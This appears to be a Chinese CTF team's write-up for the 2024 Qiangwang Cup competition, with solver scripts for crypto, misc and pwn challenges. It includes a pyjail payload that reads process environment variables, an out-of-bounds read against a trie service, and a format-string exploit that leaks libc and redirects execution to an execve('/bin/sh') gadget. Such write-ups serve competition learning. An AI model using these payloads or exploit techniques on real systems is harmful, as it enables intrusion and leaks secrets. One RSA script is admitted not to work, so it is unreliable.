HASHTEAM 强网杯 2024 WP

合集 - 比赛WP&复现(7)

1.2023 NepCTF WP2023-08-162.NSSCTF NSSCTF 2nd WP2024-02-053.HASHTEAM N1CTF 2023 WP2024-02-044.HASHTEAM 香山杯 2023 WP2024-02-04

5.HASHTEAM 强网杯 2024 WP2024-02-04

6.NSSCTF ROUND#14 love2023-08-107.DASCTF X CBCTF 2023 WP2024-02-04

收起

2023强网杯

强网杯疯狂坐牢，pwn做不了一点只能在强网先锋划划水....
太菜了，来年再战！

Crypto

Not only rsa

开就完了,直接上代码

from Crypto.Util.number import *
from tqdm import tqdm
n = 6249734963373034215610144758924910630356277447014258270888329547267471837899275103421406467763122499270790512099702898939814547982931674247240623063334781529511973585977522269522704997379194673181703247780179146749499072297334876619475914747479522310651303344623434565831770309615574478274456549054332451773452773119453059618433160299319070430295124113199473337940505806777950838270849
e = 641747
c = 730024611795626517480532940587152891926416120514706825368440230330259913837764632826884065065554839415540061752397144140563698277864414584568812699048873820551131185796851863064509294123861487954267708318027370912496252338232193619491860340395824180108335802813022066531232025997349683725357024257420090981323217296019482516072036780365510855555146547481407283231721904830868033930943
p=91027438112295439314606669837102361953591324472804851543344131406676387779969
F=Zmod(n)

root=F(c).nth_root(e,all=True)
#print(root[0])
for i in tqdm(root):
    m=long_to_bytes(int(i))
    if b'flag' in m:
        print(m)
       

flag

Babyrsa

论文题,搜了半天https://www.sciencedirect.com/science/article/pii/S0304397523002116

接下来是复现代码,但最后没能求出解

from math import floor

N=6898173619848064713447564687612858995735894135343384489074201607621085283538310939996931861826971767108397996532717248188385645126212591434896047930808649179911798954640222107637439329674735608839417381358005576992626135001753481619659559186340117078191830600433093397242376731829372681835293083621809
e=18607371079843502780378872043757955319820913116247483798885064959406363250603378245586504841113742273225193107044375347430381173075888621199154655015790594262611354939631226770280837471203456810631351598504038204190312822325230950609345436371947238885587725399278901711345945547722129359115083215511568569473191308964154024336081584451627244805369215138746534093267741448684155642482008850649100654786552416480077517243070018360909360575406706389289250072987726362674233556989150088794863182955760986933773623415912617726008667185604638388708370787554333594517677850758769655741063461283985588988450577
# N=611402847577596838649117628567007514815745193613363898749361
# e=256620536587836325389289742308993660982466972819568896656661249105081887104266414292000389611061562475252796784804753727

def small_roots(f, bounds, m, d=None):
    monomials=[]
    pols=[]
    
    if not d:
        d = f.degree()

    R = f.base_ring()
    N = R.cardinality()

    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)

    G = Sequence([], f.parent())
    for s in range(m + 1):
        for i in range(s,m+1):
            for j in range(2*s,2*s+2):
                base = x ^ (i - s)* y ^(j-2*s) * f ^ s * e ^ (m - s)
                G.append(base)
                
    for s in range(m + 1):
        for i in range(s,s+1):
            for j in range(2*s+2,2*s+t+1):
                base = x ^ (i - s)* y ^(j-2*s) * f ^ s * e ^ (m - s)
                G.append(base)
                
    for poly in G:          
        for v in poly.monomials():
            if v not in monomials:
                monomials.append(v)
    
    print(len(G))
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)

    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)

    print(B.nrows(),B.ncols())
    
    B = B.dense_matrix().LLL()

    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)

    
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots

    return []

alpha=1.997
beta=0.1
delta=0.678

r=100
m=4
t=4
FF=Zmod(2^r)
u=FF(N).nth_root(2,all=True)
print("u=",u)
#u0=63161
u0=603393209736955919317955738297
v0=2*u0+(N-u0^2)*inverse_mod(u0,2^(2*r))%2^(2*r)
print("v0=",v0)
#v0=200472128882
#v0=1567679278734573458233752031864430279097731087941138563289698
a1=v0*inverse_mod(2^(2*r-1),e)%e
print(a1)
a2=(v0^2-(N+1)^2)*inverse_mod(2^(4*r),e)%e
print(a2)
a3=(-1)*inverse_mod(2^(4*r),e)%e
print(a3)
X=floor(2*N^(alpha+delta-2))
Y=floor(3*N^(0.5-2*beta))
print('X',X)
print("Y",Y)

F.<x,y>=PolynomialRing(ZZ)
f=x*y^2+a1*x*y+a2*x+a3
res=small_roots(f,(X,Y),m)
print(res)

Misc

Happy Chess|SOLVED|1r0ny

非常凑巧，前几周看到了b站上的一个翻转棋的视频

那么思路如下：

首先对于初始棋盘来说，只要把白棋或者黑棋的位置都点一遍就可以变成相同颜色

但是规定要240步之内赢10局，所以每局就有步数限制，要在大约24步之内赢一局

所以要进行步骤的优化，优化思路如下：

对于9*9的棋盘如果把一整行或者一整列全部翻转，就会把整个棋盘直接翻转

所以对于每一个可行解，可以通过观察来进行步骤的优化

把每一次的步骤优化到24步以内之后通关即可：

本题运用b站视频里的优化原理，手动玩了10次，每次步数均在24步以内，成功拿到flag

flag

由于时间充裕，所以我是用手优化的，但是其实可以使用脚本爆破，一共有9+9=18条可以翻转的行和列，所以所有可行解的情况就有$$2^{18}$$种情况，只要使用代码全部爆破出来然后看哪个点最少就行。

Pyjail ! It's myFILTER !!!

读环境变量获取flag

{print(open("/proc/self/environ").read())}

强网先锋

石头剪刀布？

该模型对于相同输入的输出具有确定性，于是可以先指定前五个，再逐轮爆破

####### 180
from random import choice
import random
from pwn import *

def main():
    # 设置目标地址和端口
    ip = '8.147.133.95'#'8.147.135.248'
    port = 19260#39167
    context(log_level = 'debug',os = 'linux')
    # 创建一个连接到目标的socket
    #choice = [0, 0, 0, 0, 0, 1, 1, 2, 2, 0, 1, 2, 0, 2, 0, 2, 1, 0, 2, 1, 1, 0, 0, 1, 1, 1,2]
    choice=[0, 0, 0, 0, 0, 1, 1, 2, 2, 0, 1, 2, 0, 2, 0, 2, 1, 0, 2, 1, 1, 0, 0, 1, 1, 1, 2, 2, 2, 0, 0, 1, 2, 0, 0, 2, 2, 1, 1, 0, 1, 2, 0, 1, 0, 1, 0, 2, 1, 2, 2, 0, 2, 1, 0, 0, 2, 2, 1, 1, 0, 1, 0, 1, 2, 0, 2, 0, 2, 1, 0, 2, 1, 0, 0, 1, 1, 1, 2, 2, 1, 0, 1, 2, 2, 0, 1, 2, 0, 2, 0, 1, 1, 0]
    sock = remote(ip, port)
    response = sock.recvuntil('++++++++++++++++++++++++++++++++++++++++++++++++++'.encode())
    with open('replay.txt', 'w') as f:
        choice.append(random.randint(0,2))
        print(choice)
        for i in range(len(choice)):
            sock.sendlineafter('请出拳（0 - 石头，1 - 剪刀，2 - 布）：'.encode(),str(choice[i]).encode())
            response = sock.recv(0x110).decode()
            f.write(response + '\n')
            if(i < 5):
                continue
            if 'Me10n赢了' in response:
                print(i,choice[i])
                print(choice)
                print((choice[i]+1)%3)
                break
            elif '平局' in response:
                print(i,choice[i])
                print(choice)
                print((choice[i]+2)%3)
                break
        f.interactive()
    # 关闭连接
        sock.close()

if __name__ == '__main__':
    main()

Speedup

先看看前20个

from math import floor
from tqdm import tqdm
n=0
l=[]
for i in range(1,21):
    n=0
    result = factorial(2^i)
    res=str(result)
    for j in res:
        n+=int(j)
    print(n)
    l.append(n)
print(l)

输到这里https://oeis.org/数数第27个,做个md5得到结果

或者利用勒让德定理,分解(2^27)!

n=2^27
faclist=[]
for p in tqdm(range(2,n)):
    if is_prime(p):
        k=1
        res=0
        while True:
            m=pow(p,k)
            if n>=m:
                res+=floor(n/m)
            else:
                break
            k+=1
        faclist.append((p,res))
    else:
        continue
        
# faclist=str(faclist)
# with open('test.txt', 'w') as f:     
#     f.write(faclist)

res=1
for i in tqdm(faclist):
    res*=pow(i[0],i[1])
    
n=0
for i in str(res):
    n+=int(i)
print(n)

然后再计算

easyfuzz

开始先发现9个字符+\n能够吧前两位置为11，尝试遍历所有字符可能

调整输入的字符串，从最后一位开始诸位爆破（代码中逐个改repeat）

from Excalibur import *

import itertools
import string

def generate_strings():
    # 定义要包含的字符集合
    characters = string.ascii_letters + string.digits + string.punctuation

    # 生成所有长度为9的可能字符串
    all_combinations = itertools.product(characters, repeat=3)

    # 逐个生成字符串并返回
    for combination in all_combinations:
        yield ''.join(combination)

# 使用生成器函数逐个获取字符串
string_generator = generate_strings()

# 打印前几个字符串

#contextset()
remo('101.200.122.251',12199,1)
#remo('101.200.122.251',12188,1)

for _ in range(1000):
    str = (next(string_generator)+'wbGood')
    sl(str)
    ru(b'code')
    m = ru(b'\n')
    if not b'110000000' in m:
        print(str,m)

#sl(b'1'*9)
#sl(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff')
#sl(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff')
ia()

qwb

Trie

手动硬搓，也可以写脚本更快

首先理清程序逻辑，在trie树中储存ip，查找时通过控制v3的值，越界读取end数组，从secret里读出flag

调试发现，对于树中每插入节点的时候，tot+1，于是首先让tot为0x40，再控制ip（在二进制下每次减少一个1）使得tot每次+4，即可4字节4字节地读出flag。（需要注意的是会对tot进行一个*4的操作）

from Excalibur import *

#proc('./trie')
remo('47.104.150.173',1337,1)
contextset()

'''
for i in range(100):
    ip1 = '192.168.1.'+(str(i))
    sla(b'Quit.',b'1')
    sla(b'IP:',ip1)
    ip2 = '192.168.1.'+str(i+1)
    sla(b'hop:',ip2)

sla(b'Quit.',b'2')
'''
def setip(ip1,ip2):
    sla(b'Quit.',b'1')
    sla(b'IP:',ip1)
    sla(b'hop:',ip2)

def show(ip):
    sla(b'Quit.',b'3')
    sla(b'Quit.',b'2')
    sla(b'IP:',ip)
    ru(b'is')
    flag = ru(b'\n')
    print(flag)
    pause()
debug('b *$rebase(0x4060)\nb *$rebase(0x1619)\n')
setip(b'0.0.0.0',b'0.0.0.0')#+0x20
setip(b'255.255.255.255',b'0.0.0.0')#+0x20

#setip(b'127.255.255.255',b'0.0.0.0')#+0x4
#setip(b'63.255.255.255',b'0.0.0.0')#+0x4
#setip(b'31.255.255.255',b'0.0.0.0')#+0x4
#setip(b'15.255.255.255',b'0.0.0.0')#+0x4
#setip(b'7.255.255.255',b'0.0.0.0')#+0x4
#setip(b'3.255.255.255',b'0.0.0.0')#+0x4
#setip(b'1.255.255.255',b'0.0.0.0')#+0x4
#setip(b'0.255.255.255',b'0.0.0.0')#+0x4
#setip(b'0.127.255.255',b'0.0.0.0')#+0x4
#setip(b'0.63.255.255',b'0.0.0.0')#+0x4
setip(b'0.31.255.255',b'0.0.0.0')#+0x4

#setip(b'0.255.255.255',b'0.0.0.0')#+0x4
#show(b'127.255.255.255')
#show(b'63.255.255.255')
#show(b'31.255.255.255')
#show(b'15.255.255.255')
#show(b'7.255.255.255')
#show(b'3.255.255.255')
#show(b'1.255.255.255')
#show(b'0.255.255.255')
#show(b'0.127.255.255')
#show(b'0.63.255.255')
show(b'0.31.255.255')

ia()
numbers = "0.0.0.125.115.121.117.103.95.117.48.121.95.115.64.95.103.110.48.114.116.115.95.53.97.95.51.109.48.99.51.66.95.48.116.95.119.48.72.123.103.97.108.102"
reversed_numbers = numbers.split(".")[::-1]
ascii_chars = [chr(int(num)) for num in reversed_numbers]

result = "".join(ascii_chars)
print(result)

flag

ez_fmt

修改printf的返回地址劫持程序流，同时泄漏libc地址，第二次printf改返回地址为one_shot,这里不能以下写ln不然会特别慢。

from evilblade import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')
libset('./libc-2.31.so')
#libset('./libc.so.6')
evgdb()
rsetup('47.104.24.40', 1337)

stack = getx(-15,-1)
stack1 = stack - 8
dx(stack1)

#修改printf的返回地址

sd(b'%4198556c'+b'%19$paaa'+b'aaa%9$n'+p64(stack1))

libc = getx(-65,-51)
base = getbase(libc,'__libc_start_main',243)
os = base + 0xe3b01

os1 = os %0x10000
os2 = os %0x1000000
os2 = os2 >> 16
dx(stack)
dx(os)

pay1 = f'%{os2-4}c'.encode().ljust(8,b'a')
pay2 = f'%{os1-os2-3}c'.encode().ljust(8,b'a')
print(pay1)
pay = pay1 + b'a%11$hhn'+ pay2 +b'aa%10$hn' +p64(stack-232)+p64(stack-230)
print(len(pay))
pause()
sl(pay)
ia()
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''

flag